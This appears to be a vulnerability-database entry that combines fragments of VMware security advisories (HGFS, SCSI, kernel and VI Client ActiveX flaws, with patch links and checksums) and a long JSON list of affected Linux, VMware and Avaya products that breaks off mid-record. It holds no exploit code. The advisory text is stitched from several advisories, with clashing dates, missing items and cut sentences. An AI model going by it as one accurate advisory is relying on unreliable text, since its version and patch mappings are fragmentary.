

  1. Change log

2010-05-27 VMSA-2010-0009 Initial security advisory after release of patch 06 bulletins for ESX 4.0 on 2010-05-27


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center http://www.vmware.com/security

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2010 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32)

iEYEARECAAYFAkv/V8IACgkQS2KysvBH1xnqNgCcCwwelsQK6DQjcTc2wnIPp0EW E70An2gfkiCQ5FNqvf3y+kNredxyVZwI =JW3s -----END PGP SIGNATURE----- . Summary

VMware hosted product updates, ESX patches and VI Client update
resolve multiple security issues. 
VMware Player 3.1.3 and earlier.

VMware Fusion 3.1.2 and earlier.

ESXi 4.1 without patch ESXi410-201104402-BG. 
ESXi 4.0 without patch ESXi400-201104402-BG. 
ESXi 3.5 without patches ESXe350-201105401-I-SG and
                         ESXe350-201105402-T-SG.

ESX 4.1 without patch ESX410-201104401-SG
ESX 4.0 without patch ESX400-201104401-SG
ESX 3.5 without patches ESX350-201105401-SG,
                        ESX350-201105404-SG and
                        ESX350-201105406-SG.

    2) SCSI Driver Denial of Service / Possible Privilege Escalation
        A local attacker can achieve a denial of service and
        possibly a privilege escalation via a vulnerability in the
        Linux SCSI drivers.

    3) Kernel Memory Management Arbitrary Code Execution
        A context-dependent attacker can execute arbitrary code via
        a vulnerability in a kernel memory handling function. Multiple vulnerabilities in mount.vmhgfs

    This patch provides a fix for the following three security
    issues in the VMware Host Guest File System (HGFS). None of
    these issues affect Windows based Guest Operating Systems.

    1) Mount.vmhgfs Information Disclosure
        Information disclosure via a vulnerability that allows an
        attacker with access to the Guest to determine if a path
        exists in the Host filesystem and whether it is a file or
        directory regardless of permissions.

    2) Mount.vmhgfs Race Condition
        Privilege escalation via a race condition that allows an
        attacker with access to the guest to mount on arbitrary
        directories in the Guest filesystem and achieve privilege
        escalation if they can control the contents of the mounted
        directory.

    3) Mount.vmhgfs Privilege Escalation
        Privilege escalation via a procedural error that allows an
        attacker with access to the guest operating system to gain
        write access to an arbitrary file in the Guest filesystem. 
        This issue only affects Solaris and FreeBSD Guest Operating
        Systems.

    VMware would like to thank Dan Rosenberg for reporting these
    issues. VI Client ActiveX vulnerabilities

    VI Client COM objects can be instantiated in Internet Explorer
    which may cause memory corruption. An attacker who succeeded in
    making the VI Client user visit a malicious Web site could
    execute code on the user's system within the security context of
    that user.

    VMware would like to thank Elazar Broad and iDefense for
    reporting this issue to us.

    Affected versions.

    The vSphere Client which comes with vSphere 4.0 and vSphere 4.1
    is not affected. This is any build of vSphere Client Version
    4.0.0 and vSphere Client Version 4.1.0.

    VI Clients bundled with VMware Infrastructure 3 that are not
    affected are:
    - VI Client 2.0.2 Build 230598 and higher
    - VI Client 2.5 Build 204931 and higher

    The issue can be remediated by replacing an affected VI Client
    with the VI Client bundled with VirtualCenter 2.5 Update 6 or
    VirtualCenter 2.5 Update 6a.

VMware Workstation 7.1.4
----------------------------

http://downloads.vmware.com/d/info/desktop_downloads/vmware_workstation/7_0 Release notes: http://downloads.vmware.com/support/ws71/doc/releasenotes_ws714.html

VMware Workstation for Windows 32-bit and 64-bit with VMware Tools
md5sum: b52d064dff3e9fb009e0637d59b79c44
sha1sum: bf4fe9e901b45e59b33852c4612e90fb77223d64

VMware Workstation for Linux 32-bit with VMware Tools
md5sum: 5f5f25b1cfd8990e46db07788fe0adab
sha1sum: d5b4bfe0d22079988a7777dcc0f87a16b494b5f9

VMware Workstation for Linux 64-bit with VMware Tools
md5sum: 68b424f836f63c12b071a791f80b1593
sha1sum: a7d1f461830db022af8f9d872c980fc59a83c5d6

VMware Fusion 3.1.3
---------------------------

http://downloads.vmware.com/d/info/desktop_downloads/vmware_fusion_for_the_mac/3_0 Release notes:

http://downloads.vmware.com/support/fusion3/doc/releasenotes_fusion_313.html

VMware Fusion for Intel-based Macs
md5sum: f35ac5c15354723468257d2a48dc4f76
sha1sum: 3c849a62c45551fddb16eebf298cef7279d622a9

VMware Player 3.1.4
---------------------------
http://downloads.vmware.com/d/info/desktop_downloads/vmware_player/3_0
Release notes:
https://www.vmware.com/support/player31/doc/releasenotes_player314.html

VMware Player 3.1.4 for 32-bit and 64-bit Windows
md5sum: 29dd5fefe40af929dba40185eb6d4804
sha1sum: ac00488dd9e412beea2366c167ceb87ed262054f

VMware Player 3.1.4 for 32-bit Linux
md5sum: 75a41b63836d19db34f5551846c8b11d
sha1sum: 7350051c0fc781604d1d46bc24003434cbcd3b26

VMware Player 3.1.4 for 64-bit Linux
md5sum: a7fdadfb2af8d9f76571cd06f2439041
sha1sum: 90031375a9c10d9a0a5e32be154c856693ad7526

VMware ESXi 4.1
---------------------------
ESXi410-201104001
Download link:

https://hostupdate.vmware.com/software/VUM/OFFLINE/release-276-20110420-682352/ESXi410-201104001.zip md5sum: 23bd026d6cbca718fe50ed1dd73cfe9d sha1sum: 82fa6da02a1f37430a15a659254426b3d3a62662 http://kb.vmware.com/kb/1035111

ESXi410-201104001 contains ESXi410-201104402-BG.

VMware ESX 4.1
-------
ESX410-201104001
Download link:

https://hostupdate.vmware.com/software/VUM/OFFLINE/release-275-20110420-062017/ESX410-201104001.zip md5sum: 757c3370ae63c75ef5b2178bd35a4ac3 sha1sum: 95cfdc08e0988b4a0c0c3ea1a1acc1c661979888 http://kb.vmware.com/kb/1035110

Note ESX410-201104001 contains ESX410-201104401-SG.

VMware ESXi 4.0
---------------------------
ESXi400-201104001
Download link:

https://hostupdate.vmware.com/software/VUM/OFFLINE/release-278-20110424-080274/ESXi400-201104001.zip md5sum: 08216b7ba18988f608326e245ac27e98 sha1sum: 508a04532f0af007ce7c9d7693371470ed8257f0 http://kb.vmware.com/kb/1037261

Note ESXi400-201104001 contains ESXi400-201104402-BG.

VMware ESX 4.0
---------------------------
ESX400-201104001
Download link:

https://hostupdate.vmware.com/software/VUM/OFFLINE/release-277-20110424-816604/ESX400-201104001.zip

md5sum: 1a305fbf6c751403e56ef4e33cabde06
sha1sum: bc7577cb80e69fbe81e3e9272a182deb42987b3d
http://kb.vmware.com/kb/1037260

Note ESX400-201104001 contains ESX400-201104401-SG.

VMware ESXi 3.5
---------------------------
ESXe350-201105401-O-SG
Download link:
http://download3.vmware.com/software/vi/ESXe350-201105401-O-SG.zip
md5sum: 9bc9296cae1fbecf417f60941590fcb4
sha1sum: d6902377f57e3b05b08c07a810d6b58fa30aa8d5
http://kb.vmware.com/kb/1036403

Note ESXe350-201105401-O-SG contains the following security fixes:
ESXe350-201105402-T-SG and ESXe350-201105401-I-SG

VMware ESX 3.5
---------------------------
ESX350-201105401-SG
Download link:
http://download3.vmware.com/software/vi/ESX350-201105401-SG.zip
md5sum: 2853ca6e75ef5e856ec582151908ad93
sha1sum: c538971d47af4b813348d87bf2f4fa6acd9292f7
http://kb.vmware.com/kb/1036399

ESX350-201105404-SG
Download link:
http://download3.vmware.com/software/vi/ESX350-201105404-SG.zip
md5sum: 7403d4a06e2bdb9cdfb5590432f51bf8
sha1sum: 1700d6175524680b982ca4430cff77b5f7cb15c4
http://kb.vmware.com/kb/1036402

ESX350-201105406-SG
Download link:
http://download3.vmware.com/software/vi/ESX350-201105406-SG.zip
md5sum: 6c695f7d021f751959aec08fed94df11
sha1sum: 83a862c469e7f3334e2a78f6b81d98c02108b708
http://kb.vmware.com/kb/1036754
  1. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . Rather, they will be released in a staggered or "leap-frog" fashion

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200906-0612",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.8,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "vmware",
        "version": "3.5"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "vmware",
        "version": "3.5"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "esx",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "vmware",
        "version": "3.0.3"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0 (x86-64)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "4.0 (x86-64)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.7 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.7 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.8 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "enterprise linux els",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.2.z (server)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.3.z (server)"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.4.z (server)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.22_rc7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.25.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.4.36.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.25.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.4.36.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.1"
      },
      {
        "model": "kernel .0-test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.35.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.34.5"
      },
      {
        "model": "linux enterprise server unsupported extras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1.1"
      },
      {
        "model": "hat enterprise virtualization hypervisor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.15"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.32"
      },
      {
        "model": "kernel 2.6.18-8.1.8.el5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.1"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel 2.6.21-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "voice portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "linux enterprise sp2 debuginfo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.8"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "river systems linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "wind",
        "version": "3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "voice portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.6"
      },
      {
        "model": "kernel 2.6.31-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel .0-test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.2"
      },
      {
        "model": "kernel .0-test12",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel .0-test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.7"
      },
      {
        "model": "kernel -rc6-git6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel .0-test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.7"
      },
      {
        "model": "linux enterprise sp3 debuginfo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.267"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "meeting exchange sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.7"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0.0.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.6"
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.5"
      },
      {
        "model": "kernel 2.6.32-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.22-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.4"
      },
      {
        "model": "kernel 2.6.31-rc9",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18x86"
      },
      {
        "model": "linux enterprise sdk sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "linux lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.3"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.9"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel 2.6.24-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel pre-3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.09"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel 2.6.29-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
